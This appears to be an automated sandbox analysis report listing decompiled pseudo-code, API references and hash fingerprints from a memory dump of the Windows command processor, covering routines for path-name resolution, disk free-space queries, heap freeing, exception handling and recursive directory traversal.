0x00d853cc
0x00d853cc
0x00000000
0x00d853cc
0x00d853b2
0x00d853c6
0x00000000
0x00000000
0x00d99508
0x00d99508
0x00d99521
0x00d99526
0x00d9952d
0x00d9953c
0x00d99547
0x00d9954d
0x00d99553
0x00d99566
0x00d99568
0x00d99591
0x00d9956a
0x00d9956d
0x00d99573
0x00d9957b
0x00d9957d
0x00d9957d
0x00d99583
0x00d99583
0x00d9956d
0x00d99568
0x00d99547
0x00d99526
0x00000000
0x00d853b2
0x00d992ff
0x00d99462
0x00d99462
0x00d99467
0x00d9946c
0x00000000
0x00d9946c
0x00d991ec
0x00d991f4
0x00d991f6
0x00d991ff
0x00d99205
0x00d99205
0x00d99208
0x00d9920a
0x00d99217
0x00000000
0x00000000
0x00d9921d
0x00d9921f
0x00d99221
0x00d99224
0x00d99224
0x00d99227
0x00d99229
0x00d99232
0x00d9928e
0x00d9928e
0x00000000
0x00d9928e
0x00d99234
0x00d9923c
0x00d9923f
0x00d9923f
0x00d99242
0x00d99244
0x00d9924b
0x00d99251
0x00d99255
0x00d99258
0x00d9925e
0x00d9925e
0x00d99261
0x00d99263
0x00d99271
0x00d99280
0x00000000
0x00000000
0x00d99282
0x00d99288
0x00000000
0x00000000
0x00000000
0x00000000
0x00d991ae
0x00d991ae
0x00d991b1
0x00d991b3
0x00d991b3
0x00d991b9
0x00d991bb
0x00d991c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00d991c6
0x00d852d2
0x00d852d6
0x00d852d7
0x00d852da
0x00d852dc
0x00d852e5
0x00d852f5
0x00d852f7
0x00d852fb
0x00d9930c
0x00d993e9
0x00d993f1
0x00d993f3
0x00d993f6
0x00d993f6
0x00d993f9
0x00d993fb
0x00d99408
0x00d9940d
0x00d99415
0x00d9941b
0x00d9941b
0x00d9941e
0x00d99420
0x00d9942e
0x00d99434
0x00d99443
0x00000000
0x00000000
0x00d99456
0x00d9945e
0x00d99461
0x00d99461
0x00000000
0x00d99461
0x00d99315
0x00d9931d
0x00d99322
0x00d99328
0x00d99328
0x00d9932b
0x00d9932d
0x00d9933a
0x00000000
0x00000000
0x00d99340
0x00d99347
0x00d9934d
0x00d9934d
0x00d99350
0x00d99352
0x00d9935f
0x00000000
0x00000000
0x00d9936d
0x00d99372
0x00d99378
0x00d99378
0x00d9937b
0x00d9937d
0x00d9938b
0x00d99393
0x00d9939b
0x00d993a1
0x00d993a1
0x00d993a4
0x00d993a6
0x00d993c1
0x00000000
0x00000000
0x00d993cd
0x00d993da
0x00d993e2
0x00000000
0x00d993e2
0x00d85305
0x00d85362
0x00d85365
0x00d8536b
0x00d85373
0x00d8537f
0x00d994dd
0x00d994e2
0x00d994e2
0x00d85385
0x00d8538a
0x00d853f8
0x00d853f8
0x00d8539f
0x00d994f3
0x00d994f4
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8539f
0x00d8530f
0x00d85315
0x00d85317
0x00d85319
0x00d8532c
0x00d85330
0x00000000
0x00000000
0x00d85334
0x00d8533b
0x00d8533f
0x00000000
0x00000000
0x00d85349
0x00d8534d
0x00d99477
0x00d9947c
0x00d99481
0x00d99487
0x00d99487
0x00d85353
0x00d85353
0x00d85353
0x00d8535c
0x00d99492
0x00d9949b
0x00d994a1
0x00d994a1
0x00d994a4
0x00d994a6
0x00d994b7
0x00d994bf
0x00d994d1
0x00d994d1
0x00d994b7
0x00000000
0x00d8531b
0x00d8531b
0x00d8531d
0x00d8531d
0x00d8531f
0x00d85324
0x00000000
0x00d85326
0x00d85326
0x00000000
0x00d85326
0x00d85324
0x00d852e7
0x00d852e7
0x00d852e9
0x00d852e9
0x00d852eb
0x00d852f0
0x00000000
0x00d852f2
0x00d852f2
0x00000000
0x00d852f2
0x00d852f0

APIs

memset.MSVCRT ref: 00D8528C

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,00000000,?), ref: 00D85394
??_V@YAXPAX@Z.MSVCRT ref: 00D853D5

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$FullNamePath
String ID:
API String ID: 3158150540-0
Opcode ID: 0577c69b7d90aba5e5cb34c08473c43076cd2b487551779af033cc5375c4cd19
Instruction ID: e92de31996991e3d74d515e68c81a4bcccc482a2b44ce862b79803fba7796fa7
Opcode Fuzzy Hash: 0577c69b7d90aba5e5cb34c08473c43076cd2b487551779af033cc5375c4cd19
Instruction Fuzzy Hash: 9502A435A002159BCF29EF68DC946AAF3B1FF48314F5881EDD849A7254D734AE82CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00D9245C, Relevance: 9.2, APIs: 6, Instructions: 154
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D9245C(WCHAR* __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v604;
				signed int _v608;
				void _v612;
				signed int _v616;
				void* _v620;
				intOrPtr _v624;
				WCHAR* _v628;
				void* _v632;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr _t44;
				void* _t45;
				void _t47;
				void* _t53;
				void _t54;
				void _t58;
				char* _t69;
				char* _t71;
				intOrPtr* _t73;
				signed int _t75;
				void* _t76;
				WCHAR* _t77;
				void* _t80;
				void* _t81;
				signed int _t83;
				void* _t84;
				void* _t91;
				void* _t96;
				void* _t97;
				short* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				int _t104;
				void* _t105;
				signed int _t106;
				signed int _t108;

				_t90 = __edx;
				_t77 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x274;
				_t42 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t42 ^ _t108;
				_t73 = __ecx;
				_v616 = __edx;
				_v628 = __ecx;
				_v624 = 0;
				_t99 =  &(__ecx[1]);
				do {
					_t44 =  *_t73;
					_t73 = _t73 + 2;
				} while (_t44 != 0);
				_t75 = _t73 - _t99 >> 1;
				if(_t75 > __edx) {
					L21:
					_t45 = 0;
				} else {
					_t97 =  &(__ecx[3]);
					_t101 = _t97;
					_v632 = _t101;
					do {
						_t47 =  *_t97 & 0x0000ffff;
						_v612 = _t47;
						if(_t47 == 0 || _t47 == 0x5c) {
							 *_t97 = 0;
							_t80 = FindFirstFileW(_t77,  &_v604);
							_t47 = _v612;
							 *_t97 = _t47;
							if(_t80 == 0xffffffff) {
								_t97 = _t97 + 2;
								_t101 = _t97;
								goto L17;
							} else {
								FindClose(_t80);
								if(_v604.cAlternateFileName != 0) {
									if(_a4 != 0) {
										L23:
										_t53 =  &(_v604.cAlternateFileName);
										goto L12;
									} else {
										_t69 =  &(_v604.cAlternateFileName);
										__imp___wcsnicmp(_t69, _t101, _t97 - _t101 >> 1);
										_t108 = _t108 + 0xc;
										if(_t69 != 0) {
											goto L11;
										} else {
											_t71 =  &(_v604.cFileName);
											__imp___wcsicmp(_t71,  &(_v604.cAlternateFileName));
											if(_t71 == 0) {
												goto L11;
											} else {
												goto L23;
											}
										}
									}
									L14:
									_t83 = _t81 - _t91 >> 1;
									_t90 = _t83 - (_t97 - _t101 >> 1);
									_v608 = _t83;
									_t75 = _t75 + _t90;
									if(_t75 >= _v616) {
										goto L21;
									} else {
										if(_t90 > 0) {
											_t84 = _t97;
											_t102 = _t84 + 2;
											do {
												_t58 =  *_t84;
												_t84 = _t84 + 2;
											} while (_t58 != _v624);
											_t103 = _t97 + _t90 * 2;
											memmove(_t103, _t97, 1 + (_t84 - _t102 >> 1) * 2);
											_t83 = _v608;
											_t108 = _t108 + 0xc;
											_t97 = _t103;
										}
										_t104 = _t83 + _t83;
										memcpy(_v632, _v620, _t104);
										_v632 = _v632 + _t104;
										_t108 = _t108 + 0xc;
										_t105 = _v632;
										_t90 = _v616 - (_t105 - _v628 >> 1);
										E00D91040(_t105, _v616 - (_t105 - _v628 >> 1), _t97);
										_t47 = _v616;
										_t101 = _t105 + 2;
										_t97 = _t101;
										L17:
										_t77 = _v628;
										_v632 = _t101;
										goto L6;
									}
									goto L8;
								} else {
									L11:
									_t53 =  &(_v604.cFileName);
								}
								L12:
								_t81 = _t53;
								_v620 = _t53;
								_t91 = _t81 + 2;
								do {
									_t54 =  *_t81;
									_t81 = _t81 + 2;
								} while (_t54 != _v624);
								goto L14;
							}
						} else {
							goto L6;
						}
						goto L8;
						L6:
						_t97 = _t97 + 2;
					} while (_t47 != 0);
					_t45 = 1;
				}
				L8:
				_pop(_t96);
				_pop(_t100);
				_pop(_t76);
				return E00D96FD0(_t45, _t76, _v8 ^ _t108, _t90, _t96, _t100);
			}

0x00d9245c
0x00d9245c
0x00d92464
0x00d9246a
0x00d92471
0x00d9247a
0x00d9247c
0x00d92483
0x00d92487
0x00d9248b
0x00d9248e
0x00d9248e
0x00d92491
0x00d92494
0x00d9249b
0x00d9249f
0x00d925d2
0x00d925d2
0x00d924a5
0x00d924a5
0x00d924a8
0x00d924aa
0x00d924ae
0x00d924ae
0x00d924b1
0x00d924b8
0x00d924e3
0x00d924f2
0x00d924f4
0x00d924f8
0x00d924fe
0x00d9d671
0x00d9d674
0x00000000
0x00d92504
0x00d92505
0x00d92514
0x00d925a6
0x00d9d62e
0x00d9d62e
0x00000000
0x00d925ac
0x00d925b3
0x00d925bc
0x00d925c2
0x00d925c7
0x00000000
0x00d925cd
0x00d9d619
0x00d9d61e
0x00d9d628
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9d628
0x00d925c7
0x00d92534
0x00d92538
0x00d92540
0x00d92542
0x00d92546
0x00d9254c
0x00000000
0x00d92552
0x00d92554
0x00d9d63a
0x00d9d63c
0x00d9d63f
0x00d9d63f
0x00d9d642
0x00d9d645
0x00d9d64e
0x00d9d65d
0x00d9d663
0x00d9d667
0x00d9d66a
0x00d9d66a
0x00d9255a
0x00d92566
0x00d9256b
0x00d9256f
0x00d92572
0x00d92585
0x00d92587
0x00d9258c
0x00d92590
0x00d92593
0x00d92595
0x00d92595
0x00d92599
0x00000000
0x00d92599
0x00000000
0x00d9251a
0x00d9251a
0x00d9251a
0x00d9251a
0x00d9251e
0x00d9251e
0x00d92520
0x00d92524
0x00d92527
0x00d92527
0x00d9252a
0x00d9252d
0x00000000
0x00d92527
0x00000000
0x00000000
0x00000000
0x00000000
0x00d924bf
0x00d924bf
0x00d924c2
0x00d924c9
0x00d924c9
0x00d924ca
0x00d924d1
0x00d924d2
0x00d924d3
0x00d924de

APIs

FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 00D924EC
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D92505
memcpy.MSVCRT ref: 00D92566
_wcsnicmp.MSVCRT ref: 00D925BC
_wcsicmp.MSVCRT ref: 00D9D61E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
String ID:
API String ID: 242869866-0
Opcode ID: 1d18d61dec38d0cd79c3ba9c179fca3aeb5ab561e5786412941daa22974d598d
Instruction ID: 1c40d825a6b25ba1df9a0ed0794c88ffd474928a5382152ec8f4602c7d51c75e
Opcode Fuzzy Hash: 1d18d61dec38d0cd79c3ba9c179fca3aeb5ab561e5786412941daa22974d598d
Instruction Fuzzy Hash: E5519E755043529BCB24DF28DC555AAB7E5EFD8310F194A2DE889C3240EB31D905CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00DAA0D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00DAA0D2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				intOrPtr _v560;
				union _ULARGE_INTEGER _v564;
				union _ULARGE_INTEGER _v572;
				union _ULARGE_INTEGER _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				WCHAR* _t51;
				char _t60;
				WCHAR* _t69;
				void* _t77;
				void* _t78;
				void* _t79;
				signed int _t81;

				_t76 = __edx;
				_t35 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t35 ^ _t81;
				_t79 = __edx;
				_v552 = _a8;
				_t78 = __ecx;
				E00D8B6B9(__ecx);
				_v28 = 0;
				_v20 = 0x104;
				_t60 = 1;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					E00D90D89(_t76, _t79);
					_t51 = _v28;
					_t69 = _t51;
					if(_t51 == 0) {
						_t69 =  &_v548;
					}
					if( *_t69 != 0 && _t69[1] == 0x3a && _t69[2] == 0) {
						E00D90CF2(_t76, "\\");
						_t51 = _v28;
					}
					_v560 = 0;
					_v564.LowPart = 0;
					if(_t51 == 0) {
						_t51 =  &_v548;
					}
					GetDiskFreeSpaceExW(_t51,  &_v564,  &_v580,  &_v572);
					_t77 = 6;
					E00DA7A11(_t78, _t77);
					_t54 = _v28;
					if(_v28 == 0) {
						_t54 =  &_v548;
					}
					_t76 =  &_v564;
					E00DAAC75(_a4,  &_v564, 0xe, _t54, _v20);
					_t79 = _v28;
					if(_t79 == 0) {
						_t79 =  &_v548;
					}
					E00D9274C(0xdc3d00, 0x104, L"%5lu", _v552);
					_push(_t79);
					_t60 = E00DA7C83(0xdc3d00, _t76, _t78, 0x2379, 2, 0xdc3d00);
				}
				__imp__??_V@YAXPAX@Z();
				return E00D96FD0(_t60, _t60, _v8 ^ _t81, _t76, _t78, _t79, _v28);
			}

0x00daa0d2
0x00daa0dd
0x00daa0e4
0x00daa0ed
0x00daa0ef
0x00daa0f5
0x00daa0f7
0x00daa105
0x00daa110
0x00daa113
0x00daa115
0x00daa118
0x00daa141
0x00daa14e
0x00daa153
0x00daa156
0x00daa15a
0x00daa15c
0x00daa15c
0x00daa167
0x00daa181
0x00daa186
0x00daa186
0x00daa189
0x00daa18f
0x00daa197
0x00daa199
0x00daa199
0x00daa1b5
0x00daa1bd
0x00daa1c0
0x00daa1c5
0x00daa1ca
0x00daa1cc
0x00daa1cc
0x00daa1d8
0x00daa1e1
0x00daa1e6
0x00daa1eb
0x00daa1ed
0x00daa1ed
0x00daa209
0x00daa20e
0x00daa220
0x00daa220
0x00daa225
0x00daa23e

APIs

memset.MSVCRT ref: 00DAA118

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 00DAA1B5
??_V@YAXPAX@Z.MSVCRT ref: 00DAA225

Strings

%5lu, xrefs: 00DAA1FE

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$DiskFreeSpace
String ID: %5lu
API String ID: 2448137811-2100233843
Opcode ID: fa45cab9f03890220917a2797e5fee79fdac8a9b11bb26fabafbd092418a592e
Instruction ID: 9be0376f77465cd479d7a3bf0c8a04d38c27e8fd7e68b0a1e610ddf8ae7363d8
Opcode Fuzzy Hash: fa45cab9f03890220917a2797e5fee79fdac8a9b11bb26fabafbd092418a592e
Instruction Fuzzy Hash: 51418372A00219BBDF24EBA4DC85EEEB7B8EF09314F044199E505A7241E7749E85CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D8ACD5, Relevance: 6.0, APIs: 4, Instructions: 15
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D8ACD5(void** __ecx) {
				void* _t6;

				_t6 = __ecx;
				RtlFreeHeap(GetProcessHeap(), 0,  *__ecx);
				return RtlFreeHeap(GetProcessHeap(), 0, _t6);
			}

0x00d8acd8
0x00d8ace5
0x00d8acfc

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00D8ACAB), ref: 00D8ACDE
RtlFreeHeap.NTDLL(00000000), ref: 00D8ACE5
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00D8ACEE
RtlFreeHeap.NTDLL(00000000), ref: 00D8ACF5

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: f6b2168fb123f84cce570479419dcf4f2d67d676f75a26ba8840fbc9dd51d08c
Instruction ID: fde7c5ad8d5b73c0199abe1a9e5834cbe24cca1766937ce81757e9c12cc59a61
Opcode Fuzzy Hash: f6b2168fb123f84cce570479419dcf4f2d67d676f75a26ba8840fbc9dd51d08c
Instruction Fuzzy Hash: 96D0C932444713ABDB513BE0BC1EFC6BE28EF4D322F090481F645C22608AB088408B70

Uniqueness

Uniqueness Score: -1.00%

Function 00D96FE3, Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D96FE3(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00d96fea
0x00d96ff3
0x00d9700c

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D97119,00D81000), ref: 00D96FEA
UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00D97119,?,00D97119,00D81000), ref: 00D96FF3
GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00D97119,00D81000), ref: 00D96FFE
TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00D97119,00D81000), ref: 00D97005

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: cd3a13c6f7e55f6f54f5dcb30c5376c16a8c25c01e578c355a41fbc8e0d5eea2
Instruction ID: 59b85f1963b4d687853f2fa3949b07d709b2c81c4583d2843090f0be4add8eef
Opcode Fuzzy Hash: cd3a13c6f7e55f6f54f5dcb30c5376c16a8c25c01e578c355a41fbc8e0d5eea2
Instruction Fuzzy Hash: 44D0C932180307FBCB002BE1EC1CE89FF28EB84312F444500F309C2220CA314811DB79

Uniqueness

Uniqueness Score: -1.00%

Function 00DA31DC, Relevance: 4.8, APIs: 3, Instructions: 274
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00DA31DC(void* __ecx, long __edx, long _a4, intOrPtr _a8, signed short* _a12) {
				signed int _v8;
				char _v564;
				struct _WIN32_FIND_DATAW _v612;
				signed short* _v616;
				signed int _v620;
				signed int _v624;
				void* _v628;
				signed int _v632;
				short* _v636;
				intOrPtr* _v640;
				intOrPtr _v644;
				short* _v652;
				intOrPtr _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				signed int _t71;
				intOrPtr _t83;
				WCHAR* _t87;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				short _t100;
				intOrPtr _t101;
				WCHAR* _t107;
				signed short* _t119;
				void* _t120;
				short* _t121;
				signed int _t123;
				intOrPtr _t124;
				signed int _t125;
				void* _t129;
				signed short* _t130;
				short* _t134;
				intOrPtr* _t137;
				WCHAR* _t142;
				char* _t146;
				char* _t147;
				short* _t148;
				intOrPtr* _t149;
				WCHAR* _t157;
				intOrPtr* _t162;
				WCHAR* _t168;
				signed int _t170;
				void* _t177;
				signed short* _t178;
				short* _t179;
				signed int _t180;
				void* _t181;
				signed int _t183;
				signed int _t185;
				void* _t186;
				WCHAR* _t189;
				intOrPtr* _t191;
				signed int _t192;

				_t194 = (_t192 & 0xfffffff8) - 0x274;
				_t65 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t65 ^ (_t192 & 0xfffffff8) - 0x00000274;
				_v612.ftCreationTime.dwFileAttributes = __edx;
				_t162 = __ecx;
				_t119 = _a12;
				_v612.dwFileAttributes = _a4;
				_v628 = __ecx;
				_t7 = _t162 + 2; // 0x2
				_t129 = _t7;
				_v616 = _t119;
				_t185 = 0;
				do {
					_t68 =  *_t162;
					_t162 = _t162 + 2;
				} while (_t68 != 0);
				_t130 = _t119;
				_t164 = _t162 - _t129 >> 1;
				if( *_t119 == 0) {
					L53:
					_t69 = 0;
				} else {
					do {
						_t178 = _t130;
						do {
							_t71 =  *_t130 & 0x0000ffff;
							_t130 =  &(_t130[1]);
						} while (_t71 != 0);
						_t185 = _t185 + (_t130 - _t178 >> 1) + _t164;
					} while ( *_t130 != 0);
					if(0 == _t185) {
						goto L53;
					} else {
						_t9 = _t185 + 1; // 0x1
						_t187 = _t9 & 0x0000ffff;
						_v624 = _t9 & 0x0000ffff;
						_t179 = E00D900B0(_t187 + _t187);
						if(_t179 != 0) {
							_t134 = 0;
							_v632 = _t119;
							_t121 = _t179;
							if( *_v616 != 0) {
								do {
									E00D91040(_t121, _t187 - (_t121 - _t179 >> 1), _v628);
									E00D918C0(_t121, _t187 - (_t121 - _t179 >> 1), _v636);
									_t191 = E00D8D7E6(_v640);
									_t134 = _t121;
									_v640 = _t191;
									_t121 = E00D8D7E6(_t134);
									_t187 = _v632;
								} while ( *_t191 != 0);
							}
							_push(_t134);
							 *_t121 = 0;
							_v644 = E00D87EEC(_t121, _v612.ftCreationTime.dwFileAttributes, _v612.dwFileAttributes, _a8, _t179);
							E00D90040(_t179);
							_t122 = _v640;
							_t137 = _v640;
							_t24 = _t137 + 2; // 0x2
							_t164 = _t24;
							do {
								_t83 =  *_t137;
								_t137 = _t137 + 2;
							} while (_t83 != 0);
							_t25 = (_t137 - _t164 >> 1) + 2; // 0x0
							_t180 = _t25;
							_v624 = _t180;
							_t189 = E00D900B0(_t180 + _t180);
							if(_t189 == 0) {
								goto L8;
							} else {
								E00D91040(_t189, _t180, _t122);
								_t87 = _t189;
								_t142 = _t189;
								if( *_t189 != 0) {
									do {
										_t142 = _t87;
										_t87 =  &(_t87[1]);
									} while ( *_t87 != 0);
								}
								_t28 =  &(_t142[1]); // 0x2
								_t164 = _t180;
								_v632 = _t28;
								E00D918C0(_t189, _t180, "*");
								_t123 = FindFirstFileW(_t189,  &_v612);
								_v632 = _t123;
								 *_v636 = 0;
								if(_t123 == 0xffffffff) {
									_t124 = _v636;
								} else {
									do {
										if((_v612.ftCreationTime.dwFileAttributes & 0x00000010) == 0) {
											L46:
											_t124 = _v636;
											goto L47;
										} else {
											_t146 = ".";
											_t96 =  &_v564;
											while(1) {
												_t164 =  *_t96;
												if(_t164 !=  *_t146) {
													break;
												}
												if(_t164 == 0) {
													L23:
													_t125 = 0;
													_t97 = 0;
												} else {
													_t164 =  *((intOrPtr*)(_t96 + 2));
													_t38 =  &(_t146[2]); // 0x200000
													if(_t164 !=  *_t38) {
														break;
													} else {
														_t96 = _t96 + 4;
														_t146 =  &(_t146[4]);
														if(_t164 != 0) {
															continue;
														} else {
															goto L23;
														}
													}
												}
												L25:
												if(_t97 == 0) {
													goto L46;
												} else {
													_t147 = L"..";
													_t98 =  &_v564;
													while(1) {
														_t164 =  *_t98;
														if(_t164 !=  *_t147) {
															break;
														}
														if(_t164 == 0) {
															L31:
															_t99 = _t125;
														} else {
															_t164 =  *((intOrPtr*)(_t98 + 2));
															_t41 =  &(_t147[2]); // 0x2e
															if(_t164 !=  *_t41) {
																break;
															} else {
																_t98 = _t98 + 4;
																_t147 =  &(_t147[4]);
																if(_t164 != 0) {
																	continue;
																} else {
																	goto L31;
																}
															}
														}
														L33:
														if(_t99 == 0) {
															goto L46;
														} else {
															_t168 = _t189;
															_t42 =  &(_t168[1]); // 0x2
															_t148 = _t42;
															do {
																_t100 =  *_t168;
																_t168 =  &(_t168[1]);
															} while (_t100 != _t125);
															_t149 =  &_v564;
															_t170 = _t168 - _t148 >> 1;
															_t181 = _t149 + 2;
															do {
																_t101 =  *_t149;
																_t149 = _t149 + 2;
															} while (_t101 != _t125);
															_t45 = _t170 + 2; // 0x0
															_t183 = _t45 + (_t149 - _t181 >> 1);
															if(_t183 <= _v624) {
																_t183 = _v624;
																goto L45;
															} else {
																_t164 = _t183 + _t183;
																_t107 = E00D90100(_t189, _t183 + _t183);
																if(_t107 == 0) {
																	_t124 = 1;
																} else {
																	_t189 = _t107;
																	_v624 = _t183;
																	_t157 = _t107;
																	while( *_t107 != _t125) {
																		_t157 = _t107;
																		_t107 =  &(_t107[1]);
																	}
																	_t49 =  &(_t157[1]); // 0x2
																	_v632 = _t49;
																	L45:
																	E00D918C0(_t189, _t183,  &_v564);
																	E00D918C0(_t189, _t183, "\\");
																	_t164 = _v620;
																	_t124 = E00DA31DC(_t189, _v620, _v624, _a8, _v628);
																	_v656 = _t124;
																	 *_v652 = 0;
																	goto L47;
																}
															}
														}
														goto L50;
													}
													asm("sbb eax, eax");
													_t99 = _t98 | 0x00000001;
													goto L33;
												}
												goto L50;
											}
											asm("sbb eax, eax");
											_t97 = _t96 | 0x00000001;
											_t125 = 0;
											goto L25;
										}
										L50:
										FindClose(_v628);
										goto L52;
										L47:
									} while (FindNextFileW(_v628,  &(_v612.ftCreationTime)) != 0);
									goto L50;
								}
								L52:
								E00D90040(_t189);
								_t69 = _t124;
							}
						} else {
							L8:
							_t69 = 1;
						}
					}
				}
				_pop(_t177);
				_pop(_t186);
				_pop(_t120);
				return E00D96FD0(_t69, _t120, _v8 ^ _t194, _t164, _t177, _t186);
			}

0x00da31e4
0x00da31ea
0x00da31f1
0x00da31fa
0x00da3201
0x00da3204
0x00da320b
0x00da320f
0x00da3213
0x00da3213
0x00da3216
0x00da321a
0x00da321c
0x00da321c
0x00da321f
0x00da3222
0x00da3229
0x00da322b
0x00da3230
0x00da34ed
0x00da34ed
0x00da3236
0x00da3236
0x00da3236
0x00da3238
0x00da3238
0x00da323b
0x00da323e
0x00da324b
0x00da324f
0x00da3257
0x00000000
0x00da325d
0x00da325d
0x00da3260
0x00da3263
0x00da326f
0x00da3273
0x00da3281
0x00da3283
0x00da3287
0x00da328c
0x00da328e
0x00da329e
0x00da32ab
0x00da32b9
0x00da32bb
0x00da32bd
0x00da32c6
0x00da32cd
0x00da32cd
0x00da328e
0x00da32d9
0x00da32e2
0x00da32ec
0x00da32f0
0x00da32f5
0x00da32fb
0x00da32fd
0x00da32fd
0x00da3300
0x00da3300
0x00da3303
0x00da3306
0x00da330f
0x00da330f
0x00da3315
0x00da331e
0x00da3322
0x00000000
0x00da3328
0x00da332d
0x00da3334
0x00da3336
0x00da333b
0x00da333d
0x00da333d
0x00da333f
0x00da3342
0x00da333d
0x00da3347
0x00da334a
0x00da3353
0x00da3357
0x00da3368
0x00da3370
0x00da3374
0x00da337a
0x00da34de
0x00da3380
0x00da3380
0x00da3385
0x00da34b2
0x00da34b2
0x00000000
0x00da338b
0x00da338b
0x00da3390
0x00da3394
0x00da3394
0x00da339a
0x00000000
0x00000000
0x00da339f
0x00da33b6
0x00da33b6
0x00da33b8
0x00da33a1
0x00da33a1
0x00da33a5
0x00da33a9
0x00000000
0x00da33ab
0x00da33ab
0x00da33ae
0x00da33b4
0x00000000
0x00000000
0x00000000
0x00000000
0x00da33b4
0x00da33a9
0x00da33c3
0x00da33c5
0x00000000
0x00da33cb
0x00da33cb
0x00da33d0
0x00da33d4
0x00da33d4
0x00da33da
0x00000000
0x00000000
0x00da33df
0x00da33f6
0x00da33f6
0x00da33e1
0x00da33e1
0x00da33e5
0x00da33e9
0x00000000
0x00da33eb
0x00da33eb
0x00da33ee
0x00da33f4
0x00000000
0x00000000
0x00000000
0x00000000
0x00da33f4
0x00da33e9
0x00da33ff
0x00da3401
0x00000000
0x00da3407
0x00da3407
0x00da3409
0x00da3409
0x00da340c
0x00da340c
0x00da340f
0x00da3412
0x00da3419
